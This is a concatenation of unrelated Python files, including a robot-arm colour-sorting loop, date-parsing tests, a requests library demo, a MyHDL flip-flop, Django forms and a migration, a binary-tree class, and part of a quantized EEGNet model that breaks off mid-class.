                    AK.setPitchRangeMoving((world_X, world_Y, 2), -90, -90, 0, 1000)  # lower height
                    time.sleep(2)
                    if not __isRunning:
                        continue
                    Board.setBusServoPulse(1, servo1, 500)  # close gripper
                    time.sleep(1)
                    if not __isRunning:
                        continue
                    Board.setBusServoPulse(2, 500, 500)
                    AK.setPitchRangeMoving((world_X, world_Y, 12), -90, -90, 0, 1000)  # lift robot arm
                    time.sleep(1)
                    if not __isRunning:
                        continue
                    # Classify and place blocks of different colors
                    result = AK.setPitchRangeMoving((coordinate[detect_color][0], coordinate[detect_color][1], 12), -90, -90, 0)
                    time.sleep(result[2]/1000)
                    if not __isRunning:
                        continue
                    servo2_angle = getAngle(coordinate[detect_color][0], coordinate[detect_color][1], -90)
                    Board.setBusServoPulse(2, servo2_angle, 500)
                    time.sleep(0.5)
                    if not __isRunning:
                        continue
                    AK.setPitchRangeMoving((coordinate[detect_color][0], coordinate[detect_color][1], coordinate[detect_color][2] + 3), -90, -90, 0, 500)
                    time.sleep(0.5)
                    if not __isRunning:
                        continue
                    AK.setPitchRangeMoving((coordinate[detect_color]), -90, -90, 0, 1000)
                    time.sleep(0.8)
                    if not __isRunning:
                        continue
                    Board.setBusServoPulse(1, servo1 - 200, 500)  # claws open, object is lowered
                    time.sleep(0.8)
                    if not __isRunning:
                        continue
                    AK.setPitchRangeMoving((coordinate[detect_color][0], coordinate[detect_color][1], 12), -90, -90, 0, 800)
                    time.sleep(0.8)
                    initMove()  # go back to original position
                    time.sleep(1.5)
                    # reset per-object state so the next object starts fresh
                    detect_color = 'None'
                    first_move = True
                    get_roi = False
                    action_finish = True
                    start_pick_up = False
                    set_rgb(detect_color)
                else:
                    time.sleep(0.01)
        else:
            if _stop:
                _stop = False
                Board.setBusServoPulse(1, servo1 - 70, 300)
                time.sleep(0.5)
                Board.setBusServoPulse(2, 500, 500)
                AK.setPitchRangeMoving((0, 10, 10), -30, -30, -90, 1500)
                time.sleep(1.5)
            time.sleep(0.01)
# run move thread
# FIX: Thread.setDaemon() is deprecated (since Python 3.10); pass daemon=True
# to the constructor instead. Daemon so the arm loop never blocks process exit.
th = threading.Thread(target=move, daemon=True)
th.start()

t1 = 0                # timestamp when the object was first seen motionless
roi = ()              # locked region of interest from the last detection
last_x, last_y = 0, 0  # previous frame's object position (world coords)
def run(img):
    """Per-frame detection: find the largest blob of a target colour, convert
    its centre to world coordinates, and — once it has been still for 1.5 s —
    arm the pick-up sequence for the move thread. Returns the annotated frame.
    """
    global roi
    global rect
    global count
    global track
    global get_roi
    global center_list
    global __isRunning
    global unreachable
    global detect_color
    global action_finish
    global rotation_angle
    global last_x, last_y
    global world_X, world_Y
    global world_x, world_y
    global start_count_t1, t1
    global start_pick_up, first_move

    img_copy = img.copy()
    img_h, img_w = img.shape[:2]
    # crosshair overlay for operator alignment
    cv2.line(img, (0, int(img_h / 2)), (img_w, int(img_h / 2)), (0, 0, 200), 1)
    cv2.line(img, (int(img_w / 2), 0), (int(img_w / 2), img_h), (0, 0, 200), 1)
    if not __isRunning:
        return img
    frame_resize = cv2.resize(img_copy, size, interpolation=cv2.INTER_NEAREST)
    frame_gb = cv2.GaussianBlur(frame_resize, (11, 11), 11)
    # if the object is detected in the area, the area is considered detected until it is not
    if get_roi and start_pick_up:
        get_roi = False
        frame_gb = getMaskROI(frame_gb, roi, size)
    frame_lab = cv2.cvtColor(frame_gb, cv2.COLOR_BGR2LAB)  # convert image to LAB space
    area_max = 0
    areaMaxContour = 0
    if not start_pick_up:
        for i in color_range:
            if i in __target_color:
                detect_color = i
                # threshold camera image to the expected block colour range
                frame_mask = cv2.inRange(frame_lab, color_range[detect_color][0], color_range[detect_color][1])
                opened = cv2.morphologyEx(frame_mask, cv2.MORPH_OPEN, np.ones((6, 6), np.uint8))  # filter out detections outside of block
                closed = cv2.morphologyEx(opened, cv2.MORPH_CLOSE, np.ones((6, 6), np.uint8))  # filter out non-detections within object
                contours = cv2.findContours(closed, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2]  # generate contours
                areaMaxContour, area_max = getAreaMaxContour(contours)  # find contour with max area
        if area_max > 2500:  # if maximum area is above threshold
            rect = cv2.minAreaRect(areaMaxContour)
            box = np.int0(cv2.boxPoints(rect))
            roi = getROI(box)  # get ROI area
            get_roi = True
            img_centerx, img_centery = getCenter(rect, roi, size, square_length)  # center pixel coordinates of block
            world_x, world_y = convertCoordinate(img_centerx, img_centery, size)  # pixel -> world position
            cv2.drawContours(img, [box], -1, range_rgb[detect_color], 2)
            cv2.putText(img, '(' + str(world_x) + ',' + str(world_y) + ')', (min(box[0, 0], box[2, 0]), box[2, 1] - 10),
                        cv2.FONT_HERSHEY_SIMPLEX, 0.5, range_rgb[detect_color], 1)  # draw the center point on image
            # compare with the last coordinates to determine whether the object moved
            distance = math.sqrt(pow(world_x - last_x, 2) + pow(world_y - last_y, 2))
            last_x, last_y = world_x, world_y
            track = True
            # if block reached destination start next pickup operation
            if action_finish:
                if distance < 0.3:
                    center_list.extend((world_x, world_y))
                    count += 1
                    if start_count_t1:
                        start_count_t1 = False
                        t1 = time.time()
                    if time.time() - t1 > 1.5:
                        # still for 1.5 s: average the samples and arm pick-up
                        rotation_angle = rect[2]
                        start_count_t1 = True
                        world_X, world_Y = np.mean(np.array(center_list).reshape(count, 2), axis=0)
                        count = 0
                        center_list = []
                        start_pick_up = True
                else:
                    # object moved: restart the stillness timer
                    t1 = time.time()
                    start_count_t1 = True
                    count = 0
                    center_list = []
    return img
if __name__ == '__main__':
    # standalone demo: track red blocks and show annotated frames until
    # ESC (key code 27) is pressed
    init()
    start()
    __target_color = ('red', )
    my_camera = Camera.Camera()
    my_camera.camera_open()
    while True:
        img = my_camera.frame
        if img is not None:
            frame = img.copy()
            Frame = run(frame)
            cv2.imshow('Frame', Frame)
            key = cv2.waitKey(1)
            if key == 27:
                break
    my_camera.camera_close()
    cv2.destroyAllWindows()
|
from datetime import datetime
import pytest
from dates import _get_dates, convert_to_datetime, get_month_most_posts
@pytest.fixture(scope="module")
def dates():
    """Raw RFC-2822 date strings shared by all tests in this module."""
    return _get_dates()
@pytest.mark.parametrize("date_str, expected", [
    ('Thu, 04 May 2017 20:46:00 +0200', datetime(2017, 5, 4, 20, 46)),
    ('Wed, 22 Mar 2017 12:42:00 +0100', datetime(2017, 3, 22, 12, 42)),
    ('Mon, 20 Feb 2017 00:01:00 +0100', datetime(2017, 2, 20, 0, 1)),
    ('Sun, 07 Jan 2018 12:00:00 +0100', datetime(2018, 1, 7, 12, 0)),
    ('Sat, 15 Apr 2017 01:00:00 +0200', datetime(2017, 4, 15, 1, 0))
])
def test_convert_to_datetime(date_str, expected):
    """convert_to_datetime parses RFC-2822 strings (offset ignored here)."""
    dt = convert_to_datetime(date_str)
    # support tz aware datetimes
    assert dt.replace(tzinfo=None) == expected.replace(tzinfo=None)
def test_get_month_most_posts(dates):
    """The busiest month over the unmodified fixture data is Jan 2017."""
    converted_dates = [convert_to_datetime(d) for d in dates]
    assert get_month_most_posts(converted_dates) == '2017-01'
def test_get_month_most_posts_more_in_2018(dates):
    """Adding extra Jan-2018 entries flips the busiest month to 2018-01.

    NOTE(review): this appends to the module-scoped `dates` fixture in place,
    so it relies on running after test_get_month_most_posts — confirm the
    intended test ordering.
    """
    # make Jan 2018 > Jan 2017
    for _ in range(25):
        dates.append('Sun, 07 Jan 2018 12:00:00 +0100')
    converted_dates = [convert_to_datetime(d) for d in dates]
    assert get_month_most_posts(converted_dates) == '2018-01'
import json
import requests
# Demo of the `requests` API: GET/POST/PUT/DELETE/HEAD/OPTIONS, query params,
# cookies, streaming, JSON bodies and file upload (httpbin.org / GitHub).
r = requests.get('https://api.github.com/events')
print(r.status_code)
# BUG FIX: `print(r.__str__)` printed the bound method object, not the
# response; printing the response itself invokes __str__.
print(r)
print(r.apparent_encoding)
print(r.headers)

# iterate the first few raw body bytes (iterating bytes yields ints)
v = 0
content = r.content
print(type(content))
for line in content:
    if v > 5:
        break
    print(str(line))
    v += 1

r = requests.post('https://httpbin.org/post', data={'key': 'value'})
print(r.status_code)
print(r.headers)

r = requests.put('https://httpbin.org/put', data={'arjun': 'bhag'})
print(r.status_code)

r = requests.delete('https://httpbin.org/delete')
print(r.status_code)

r = requests.head('https://httpbin.org/get')
print(r.status_code)

r = requests.options('https://httpbin.org/get')
print(r.status_code)
print(r.text)

r = requests.get('https://api.github.com/events')
print(r.text)
print(r.encoding)
print(r.url)

# list values repeat the key in the encoded query string
payload = {'key1': 'value1', 'key2': [1, 2, 3]}
r = requests.get('https://api.github.com/events', params=payload)
print(r.url)
#r.encoding = 'ISO-8859-1'
print(type(r.text))

p = r.text.split(',')
v = 0
for line in p:
    print(line)
    v += 1
    if v > 5:
        break

print(r.json())
print(r.raise_for_status())  # None when the status is OK; raises otherwise
print(r.status_code)

r = requests.get('https://api.github.com/events', stream=True)
print(r.raw.read(5))

url = 'https://api.github.com/some/endpoint'
payload = {'some': 'data'}
r = requests.post(url, data=json.dumps(payload))
print(r.status_code)  # 404

# BUG FIX: the uploaded file handle was never closed; use a context manager.
url = 'https://httpbin.org/post'
with open('basic.py', 'rb') as upload:
    files = {'file': upload}
    r = requests.post(url, files=files)
print(type(r.content))
print(r.text)

if r.status_code == requests.codes.ok:
    print('Hi hello bol k ')
print(requests.codes.ok)
print(requests)

url = 'https://httpbin.org/cookies'
cookies = dict(cookies_are='working')
r = requests.get(url, cookies=cookies)
print(r.text)
|
# Project Euler 6: difference between the square of the sum and the sum of
# the squares of the first 100 natural numbers (sum(1..100) = 50 * 101).
# FIX: the original was Python-2-only (`xrange`, print-statement parsing);
# under Python 3 it raised NameError. Ported to a py3 print() call.
print((50 * 101) ** 2 - sum(x ** 2 for x in range(1, 101)))
|
from myhdl import *
from random import randrange
_code_git_version = "f114546e1715d9e5847695c64e486e6793ebb9ea"
_code_repository = "https://github.com/plops/cl-py-generator/tree/master/example/56_myhdl/source/run_00_flop.py"
_code_generation_time = "08:39:04 of Thursday, 2021-06-10 (GMT+1)"
def dff(q, d, clk):
    """D flip-flop: q takes the value of d on every rising clock edge."""
    @always(clk.posedge)
    def logic():
        q.next = d
    return logic
def test_dff():
    """Testbench: 20-unit-period clock plus random data on falling edges."""
    q, d, clk = [Signal(bool(0)) for i in range(3)]
    dff_inst = dff(q, d, clk)

    @always(delay(10))
    def clkgen():
        # toggle the clock every 10 simulation time units
        clk.next = not (clk)

    @always(clk.negedge)
    def stimulus():
        # drive a random bit onto d while the flop is not sampling
        d.next = randrange(2)

    return dff_inst, clkgen, stimulus
def simulate(timesteps):
    """Run the traced testbench for `timesteps` time units (writes a VCD)."""
    tb = traceSignals(test_dff)
    sim = Simulation(tb)
    sim.run(timesteps)

simulate(2000)
def convert():
    """Export the flip-flop to Verilog (toVerilog writes dff.v)."""
    q = Signal(bool(0))
    d = Signal(bool(0))
    clk = Signal(bool(0))
    toVerilog(dff, q, d, clk)

convert()
|
from .forms import ElectionRemindersSignupForm, MailingListSignupForm
from .constants import MAILING_LIST_FORM_PREFIX, ELECTION_REMINDERS_FORM_PREFIX
def signup_form(request):
    """Context processor/view helper returning both signup forms.

    A form is bound to request.POST only when its prefix appears in the POST
    data, so submitting one form never triggers validation on the other.
    """
    initial = {"source_url": request.path}

    def _build(form_cls, prefix):
        # bind only the form that was actually submitted
        if prefix in request.POST:
            return form_cls(initial=initial, data=request.POST)
        return form_cls(initial=initial)

    return {
        "mailing_list_form": _build(MailingListSignupForm, MAILING_LIST_FORM_PREFIX),
        "election_reminders_form": _build(
            ElectionRemindersSignupForm, ELECTION_REMINDERS_FORM_PREFIX
        ),
    }
|
class Node:
    """Binary search tree node: values smaller than this node go left,
    everything else (including duplicates) goes right."""

    left = None   # left child Node, or None
    right = None  # right child Node, or None
    value = 0     # payload stored at this node

    def __init__(self, data):
        self.value = data

    def Print(self, before):
        """Print the subtree with box-drawing connectors, prefixed by `before`.

        BUG FIX: every recursive call previously omitted the required
        `before` argument (TypeError on any tree with children), and the
        two-children branch recursed into the left child twice instead of
        left then right.
        NOTE(review): the prefix is forwarded unchanged, so deeper levels
        repeat the same indentation; Print3 is the fully-indented variant.
        """
        if self.left is not None and self.right is not None:
            print(before + "├── " + str(self.left.value))
            self.left.Print(before)
            print(before + "└── " + str(self.right.value))
            self.right.Print(before)
            return ""
        if self.left is not None and self.right is None:
            print(before + "└── " + str(self.left.value))
            self.left.Print(before)
            return ""
        if self.right is not None and self.left is None:
            print(before + "└── " + str(self.right.value))
            self.right.Print(before)
            return ""

    def PrintValues(self):
        """Print all values (left subtree, right subtree, then self)."""
        if self.left is not None:
            self.left.PrintValues()
        if self.right is not None:
            self.right.PrintValues()
        print(self.value, end=" ")

    def AddValue(self, value):
        """Insert `value` into the subtree rooted here."""
        if self.value > value:
            if self.left is not None:
                self.left.AddValue(value)
            else:
                self.left = Node(value)
        else:
            if self.right is not None:
                self.right.AddValue(value)
            else:
                self.right = Node(value)

    def Print2(self, data, before, index):
        """Insert connector lines for this subtree into `data` (sideways layout)."""
        if self.left is not None and self.right is not None:
            data.insert(index, "|" + self.GetSpaces(5) + self.GetSpaces(before) + "┌──── " + str(self.left.value))
            data.insert(index + 1, "|" + self.GetSpaces(5) + self.GetSpaces(before) + "└──── " + str(self.right.value))
            self.left.Print2(data, before + 6, index)
            self.right.Print2(data, before + 6, index + 1)
            return
        if self.left is not None:
            data.insert(index, "|" + self.GetSpaces(5) + self.GetSpaces(before) + "┌──── " + str(self.left.value))
            self.left.Print2(data, before + 6, index)
            return
        if self.right is not None:
            data.insert(index + 1, "|" + self.GetSpaces(5) + self.GetSpaces(before) + "└──── " + str(self.right.value))
            self.right.Print2(data, before + 6, index + 1)

    def ValueFixed(self):
        """Return the value as a string padded or truncated to exactly 6 chars.

        BUG FIX: the original concatenated the raw (possibly non-str) value
        onto a string, raising TypeError for int payloads.
        """
        text = str(self.value)
        if len(text) < 6:
            return text + " " * (6 - len(text))
        return text[:6]

    def GetSpaces(self, count):
        """Return a string of `count` spaces."""
        return " " * count

    #code from: https://stackoverflow.com/a/54074933
    #code cleaned up by me
    def _display_aux(self):
        """Returns list of strings, width, height, and horizontal coordinate of the root."""
        # No child.
        if self.right is None and self.left is None:
            line = '%s' % self.value
            width = len(line)
            height = 1
            middle = width // 2
            return [line], width, height, middle
        # Only left child.
        if self.right is None:
            lines, oldWidth, oldHeight, oldMiddle = self.left._display_aux()
            line = '%s' % self.value
            width = len(line)
            first_line = (oldMiddle + 1) * ' ' + (oldWidth - oldMiddle - 1) * '_' + line
            second_line = oldMiddle * ' ' + '/' + (oldWidth - oldMiddle - 1 + width) * ' '
            shifted_lines = []
            for line in lines:
                shifted_lines.append(line + width * ' ')
            newLines = [first_line, second_line] + shifted_lines
            return newLines, oldWidth + width, oldHeight + 2, oldWidth + width // 2
        # Only right child.
        if self.left is None:
            lines, oldWidth, oldHeight, oldMiddle = self.right._display_aux()
            line = '%s' % self.value
            width = len(line)
            first_line = line + oldMiddle * '_' + (oldWidth - oldMiddle) * ' '
            second_line = (width + oldMiddle) * ' ' + '\\' + (oldWidth - oldMiddle - 1) * ' '
            shifted_lines = []
            for line in lines:
                shifted_lines.append(width * ' ' + line)
            newLines = [first_line, second_line] + shifted_lines
            return newLines, oldWidth + width, oldHeight + 2, width // 2
        # Two children.
        left, oldWidthLeft, oldHeightLeft, oldMiddleLeft = self.left._display_aux()
        right, oldWidthRight, oldHeightRight, oldMiddleRight = self.right._display_aux()
        line = '%s' % self.value
        width = len(line)
        first_line = (oldMiddleLeft + 1) * ' ' + (oldWidthLeft - oldMiddleLeft - 1) * '_' + line + oldMiddleRight * '_' + (oldWidthRight - oldMiddleRight) * ' '
        second_line = oldMiddleLeft * ' ' + '/' + (oldWidthLeft - oldMiddleLeft - 1 + width + oldMiddleRight) * ' ' + '\\' + (oldWidthRight - oldMiddleRight - 1) * ' '
        # pad the shorter column so the two halves can be zipped line by line
        if oldHeightLeft < oldHeightRight:
            left += [oldWidthLeft * ' '] * (oldHeightRight - oldHeightLeft)
        elif oldHeightRight < oldHeightLeft:
            right += [oldWidthRight * ' '] * (oldHeightLeft - oldHeightRight)
        zipped_lines = zip(left, right)
        lines = [first_line, second_line] + [a + width * ' ' + b for a, b in zipped_lines]
        return lines, oldWidthLeft + oldWidthRight + width, max(oldHeightLeft, oldHeightRight) + 2, oldWidthLeft + width // 2

    def Print3(self, data, before, line):
        """Append one fully-indented text line per node (in-order traversal)."""
        if self.left is not None:
            self.left.Print3(data, before + 6, "┌──── ")
        data.append(self.GetBeforeStr(before) + line + str(self.value))
        if self.right is not None:
            self.right.Print3(data, before + 6, "└──── ")

    def GetBeforeStr(self, before):
        """Return '|     ' repeated once per 6 units of `before`."""
        returnStr = ""
        while before > 0:
            before -= 6
            returnStr += "|" + " " * 5
        return returnStr
# Generated by Django 2.1.2 on 2018-11-28 08:11
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add order.status_of_order choice field (default 'new')."""

    dependencies = [
        ('orders', '0007_auto_20181127_2315'),
    ]

    operations = [
        migrations.AddField(
            model_name='order',
            name='status_of_order',
            field=models.CharField(choices=[('new', 'новий'), ('executed', 'виконаний')], default='new', max_length=10, verbose_name='Статус заказу'),
        ),
    ]
|
"""
This file contains the golden model for the quantized EEGNet in integer representation.
"""
__author__ = "Tibor Schneider"
__email__ = "sctibor@student.ethz.ch"
__version__ = "0.0.1"
__date__ = "2020/01/20"
__license__ = "Apache 2.0"
__copyright__ = """
Copyright (C) 2020 ETH Zurich. All rights reserved.
Author: Tibor Schneider, ETH Zurich
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the License); you may
not use this file except in compliance with the License.
You may obtain a copy of the License at
www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an AS IS BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from operator import mul
from functools import reduce
import json
import numpy as np
import convert_torch_format as convert
import functional as F
class GoldenModel:
    """
    Golden EEGNet Model
    """
    def __init__(self, config_file, net_file, clip_balanced=True, no_scale_between_l1_l2=False, reorder_bn=True):
        """
        Initialize the model based on the config file and the npz file containing all weights

        Parameters:
        - config_file: filename of config.json (from QuantLab)
        - net_file: filename of net.npz (exported from QuantLab)
        - clip_balanced: forwarded to every layer's quantization clipping
        - no_scale_between_l1_l2: fuse layers 1 and 2 without a rescale step
        - reorder_bn: forwarded to layers via net_params
        """
        # load network parameters
        net = np.load(net_file)
        # load configuration file
        with open(config_file, "r") as _f:
            config = json.load(_f)
        # we only need the network parameters
        net_params = config["indiv"]["net"]["params"]
        # only allow nets with 255 levels
        assert net_params["weightInqNumLevels"] == 255
        assert net_params["actSTENumLevels"] == 255
        # only allow nets which are trained by floorToZero
        assert net_params["floorToZero"]
        # initialize dimensions
        self.num_levels = net_params["weightInqNumLevels"]
        self.F1 = net_params["F1"]
        self.F2 = net_params["F2"]
        self.D = net_params["D"]
        self.C = net_params["C"]
        self.T = net_params["T"]
        self.N = net_params["N"]
        self.reorder_bn = reorder_bn
        net_params["reorder_bn"] = reorder_bn
        if self.F2 is None:
            self.F2 = self.D * self.F1
        # only allow F2 = F1 * D
        assert self.F2 == self.F1 * self.D
        # load individual layers (layers 1+2 are fused when no rescale is
        # wanted between them)
        if no_scale_between_l1_l2:
            self.layers = [
                FusedLayer12(net, **net_params, clip_balanced=clip_balanced),
                Layer3(net, **net_params, clip_balanced=clip_balanced),
                Layer4(net, **net_params, clip_balanced=clip_balanced),
                Layer5(net, **net_params, clip_balanced=clip_balanced)
            ]
        else:
            self.layers = [
                Layer1(net, **net_params, clip_balanced=clip_balanced),
                Layer2(net, **net_params, clip_balanced=clip_balanced),
                Layer3(net, **net_params, clip_balanced=clip_balanced),
                Layer4(net, **net_params, clip_balanced=clip_balanced),
                Layer5(net, **net_params, clip_balanced=clip_balanced)
            ]
        # expose the end-to-end scales and shapes of the layer chain
        self.input_scale = self.layers[0].input_scale
        self.output_scale = self.layers[-1].output_scale
        self.input_shape = self.layers[0].input_shape
        self.output_shape = self.layers[-1].output_shape

    def __str__(self):
        """Human-readable per-layer summary plus total memory footprint."""
        ret = "\n\n".join([str(l) for l in self.layers])
        ret += "\n\nTotal Memory: {} B".format(self.mem_size())
        return ret

    def __call__(self, x):
        """Run the input through all layers in sequence."""
        for l in self.layers:
            x = l(x)
        return x

    def num_params(self):
        """Total number of parameters across all layers."""
        return sum([l.num_params() for l in self.layers])

    def mem_size(self):
        """Total number of bytes in memory across all layers."""
        return sum([l.mem_size() for l in self.layers])
class Layer:
    """
    Abstract base class for quantized layers.

    Important fields:
    - input_shape, output_shape: shapes consumed / produced
    - input_scale, output_scale: quantization scale factors
    """
    def __init__(self, clip_balanced=False, **params):
        self.input_shape = (0,)
        self.output_shape = (0,)
        self.name = ""
        self.input_scale = 1
        self.output_scale = 1
        self.clip_balanced = clip_balanced

    def __call__(self, x):
        """Execute the layer; the base class is the identity."""
        return x

    def __str__(self):
        """Return a formatted multi-line summary of the layer."""
        summary = [
            "{}".format(self.name),
            "  Input: {}".format(self.input_shape),
            "  Output: {}".format(self.output_shape),
            "  n params: {}".format(self.num_params()),
        ]
        return "\n".join(summary) + "\n  Memory: {} B".format(self.mem_size())

    def num_params(self):
        """Number of parameters (base layers have none)."""
        return 0

    def mem_size(self):
        """Number of bytes in memory (base layers use none)."""
        return 0
class FusedLayer12(Layer):
    """
    Convolution(time) + BN + Convolution(space) + BN + RELU + POOL, no scale in between

    Fuses the first two network stages: stage 1's requantization factor is
    folded into stage 2's factor/bias so no intermediate rescaling is needed.
    """
    def __init__(self, net, C, T, F1, F2, clip_balanced=True, **params):
        # Fix: the label was a copy-paste of Layer1's ("Layer 1: Convolution in
        # Time + Batch Norm") and mislabeled this fused block in the printed
        # network summary.
        self.name = "Layer 1+2 (fused): Convolution in Time + Space + Batch Norm + ReLU + Pooling"
        self.C = C
        self.T = T
        self.F1 = F1
        self.F2 = F2
        self.input_shape = ((C, T))
        self.output_shape = ((F2, T // 8))
        self.clip_balanced = clip_balanced
        # fetch weights
        self.weights_1, self.weight_scale_1 = convert.inq_conv2d(net, "conv1")
        assert self.weights_1.shape == (self.F1, 1, 1, 64)
        self.weights_1 = np.reshape(self.weights_1, (self.F1, 64))
        self.weights_2, self.weight_scale_2 = convert.inq_conv2d(net, "conv2")
        assert self.weights_2.shape == (self.F2, 1, self.C, 1)
        self.weights_2 = np.reshape(self.weights_2, (self.F2, self.C))
        # fetch batch norm offset and scale
        self.input_scale = convert.ste_quant(net, "quant1")
        self.intermediate_scale = convert.ste_quant(net, "quant2")
        self.output_scale = convert.ste_quant(net, "quant3")
        self.bn_scale_1, self.bn_offset_1 = convert.batch_norm(net, "batch_norm1")
        self.bn_scale_2, self.bn_offset_2 = convert.batch_norm(net, "batch_norm2")
        self.factor_1, self.bias_1 = convert.div_factor_batch_norm(self.input_scale, self.weight_scale_1,
                                                                   self.intermediate_scale, self.bn_scale_1,
                                                                   self.bn_offset_1)
        self.factor_2, self.bias_2 = convert.div_factor_batch_norm(self.intermediate_scale, self.weight_scale_2,
                                                                   self.output_scale, self.bn_scale_2,
                                                                   self.bn_offset_2, pool=8)
        # Update the factors and scales: fold stage-1 factors into stage 2 so
        # the intermediate requantization can be skipped.
        # NOTE(review): hard-coded for F2 == 16 with F1 == 8 (k // 2 maps each
        # pair of output channels to one stage-1 channel) -- confirm before
        # reusing with other filter counts.
        for k in range(16):
            self.factor_2[k] *= self.factor_1[k // 2]
            self.bias_2[k] *= self.factor_1[k // 2]

    def num_params(self):
        """Number of stored parameters: both weight sets plus both factor/bias sets."""
        count = reduce(mul, self.weights_1.shape)
        count += reduce(mul, self.factor_1.shape)
        count += reduce(mul, self.bias_1.shape)
        count += reduce(mul, self.weights_2.shape)
        count += reduce(mul, self.factor_2.shape)
        count += reduce(mul, self.bias_2.shape)
        return count

    def mem_size(self):
        """Bytes in memory: 1 B per stage-1 weight, 4 B per remaining entry."""
        count = reduce(mul, self.weights_1.shape)
        count += 4 * reduce(mul, self.factor_1.shape)
        count += 4 * reduce(mul, self.bias_1.shape)
        count += 4 * reduce(mul, self.weights_2.shape)
        count += 4 * reduce(mul, self.factor_2.shape)
        count += 4 * reduce(mul, self.bias_2.shape)
        return count

    def __call__(self, x):
        """Run time conv + bias, space conv, ReLU, pooling and requantization."""
        assert x.shape == self.input_shape, "shape was {}".format(x.shape)
        y = F.conv_time(x, self.weights_1)
        # add the offset
        for k in range(self.F1):
            y[k] += self.bias_1[k]
        # do the second layer
        y = F.depthwise_conv_space(y, self.weights_2)
        y = F.relu(y, -(self.bias_2 // 8))
        y = F.pool(y, (1, 8))
        y = F.apply_factor_offset(y, self.factor_2, self.bias_2, clip_balanced=self.clip_balanced)
        return y
class Layer1(Layer):
    """
    Convolution(time) + BN

    Quantized temporal convolution (kernel length 64) whose batch norm is
    folded into a per-channel requantization factor and bias.
    """
    def __init__(self, net, C, T, F1, clip_balanced=True, **params):
        # net: trained/quantized parameter dict; C/T: input channels/samples;
        # F1: number of temporal filters.
        self.name = "Layer 1: Convolution in Time + Batch Norm"
        self.C = C
        self.T = T
        self.F1 = F1
        self.input_shape = ((C, T))
        self.output_shape = ((F1, C, T))
        self.clip_balanced = clip_balanced
        # fetch weights
        self.weights, self.weight_scale = convert.inq_conv2d(net, "conv1")
        assert self.weights.shape == (self.F1, 1, 1, 64)
        self.weights = np.reshape(self.weights, (self.F1, 64))
        # fetch batch norm offset and scale
        self.input_scale = convert.ste_quant(net, "quant1")
        self.output_scale = convert.ste_quant(net, "quant2")
        self.bn_scale, self.bn_offset = convert.batch_norm(net, "batch_norm1")
        # Fold BN plus the input/output quantization scales into one factor/bias.
        self.factor, self.bias = convert.div_factor_batch_norm(self.input_scale, self.weight_scale,
                                                               self.output_scale, self.bn_scale,
                                                               self.bn_offset)

    def num_params(self):
        """Number of stored parameters: weights plus folded BN factor and bias."""
        count = reduce(mul, self.weights.shape)
        count += reduce(mul, self.factor.shape)
        count += reduce(mul, self.bias.shape)
        return count

    def mem_size(self):
        """Bytes in memory: 1 B per weight, 4 B per factor/bias entry."""
        count = reduce(mul, self.weights.shape)
        count += 4 * reduce(mul, self.factor.shape)
        count += 4 * reduce(mul, self.bias.shape)
        return count

    def __call__(self, x):
        """Apply the temporal convolution, then requantize with the folded BN."""
        assert x.shape == self.input_shape, "shape was {}".format(x.shape)
        y = F.conv_time(x, self.weights)
        y = F.apply_factor_offset(y, self.factor, self.bias, clip_balanced=self.clip_balanced)
        return y
class Layer2(Layer):
    """
    Convolution(channels) + BN + ReLU + Pool

    Quantized depthwise spatial convolution followed by BN, ReLU and a 1x8
    pooling; `reorder_bn` selects which order those post-ops run in.
    """
    def __init__(self, net, C, T, F1, F2, reorder_bn=True, clip_balanced=True, **params):
        self.name = "Layer 2: Convolution in Space + Batch Norm + ReLU + Pooling"
        self.C = C
        self.T = T
        self.F1 = F1
        self.F2 = F2
        self.input_shape = ((F1, C, T))
        self.output_shape = ((F2, T // 8))
        self.clip_balanced = clip_balanced
        # When True, ReLU + pool run before the BN requantization (see __call__).
        self.reorder_bn = reorder_bn
        # fetch weights
        self.weights, self.weight_scale = convert.inq_conv2d(net, "conv2")
        # NOTE(review): float_weights is computed but not used anywhere in this
        # class -- presumably kept for debugging/inspection; confirm before removing.
        self.float_weights = np.reshape(net["conv2.weightFrozen"], (self.F2, self.C))
        self.float_weights = np.flip(self.float_weights, (-1))
        assert self.weights.shape == (self.F2, 1, self.C, 1)
        self.weights = np.reshape(self.weights, (self.F2, self.C))
        # fetch batch norm offset and scale
        self.input_scale = convert.ste_quant(net, "quant2")
        self.output_scale = convert.ste_quant(net, "quant3")
        self.bn_scale, self.bn_offset = convert.batch_norm(net, "batch_norm2")
        # pool=8 folds the 1x8 pooling into the requantization factor/bias.
        self.factor, self.bias = convert.div_factor_batch_norm(self.input_scale, self.weight_scale,
                                                               self.output_scale, self.bn_scale,
                                                               self.bn_offset, pool=8)

    def num_params(self):
        """Number of stored parameters: weights plus folded BN factor and bias."""
        count = reduce(mul, self.weights.shape)
        count += reduce(mul, self.factor.shape)
        count += reduce(mul, self.bias.shape)
        return count

    def mem_size(self):
        """Bytes in memory: 1 B per weight, 4 B per factor/bias entry."""
        count = reduce(mul, self.weights.shape)
        count += 4 * reduce(mul, self.factor.shape)
        count += 4 * reduce(mul, self.bias.shape)
        return count

    def __call__(self, x):
        """Depthwise spatial conv, then BN/ReLU/pool in one of two equivalent orders."""
        assert x.shape == self.input_shape
        y = F.depthwise_conv_space(x, self.weights)
        if self.reorder_bn:
            # ReLU and pool first, then fold in factor and bias.
            y = F.relu(y, -(self.bias // 8))
            y = F.pool(y, (1, 8))
            y = F.apply_factor_offset(y, self.factor, self.bias, clip_balanced=self.clip_balanced)
        else:
            # Requantize first (factor/bias prescaled by the pool width), then
            # ReLU at zero and average-pool.
            y = F.apply_factor_offset(y, self.factor // 8, self.bias // 8,
                                      clip_balanced=self.clip_balanced)
            y = F.relu(y, (self.bias) * 0)
            y = F.pool(y, (1, 8)) // 8
        return y
class Layer3(Layer):
    """
    Convolution(T)

    Quantized depthwise temporal convolution (kernel length 16) rescaled by a
    single scalar factor; no batch norm in this stage.
    """
    def __init__(self, net, T, F2, clip_balanced=True, **params):
        self.name = "Layer 3: Convolution in Time"
        self.T = T
        self.F2 = F2
        self.input_shape = ((F2, T // 8))
        self.output_shape = ((F2, T // 8))
        self.clip_balanced = clip_balanced
        # fetch weights
        self.weights, self.weight_scale = convert.inq_conv2d(net, "sep_conv1")
        assert self.weights.shape == (self.F2, 1, 1, 16)
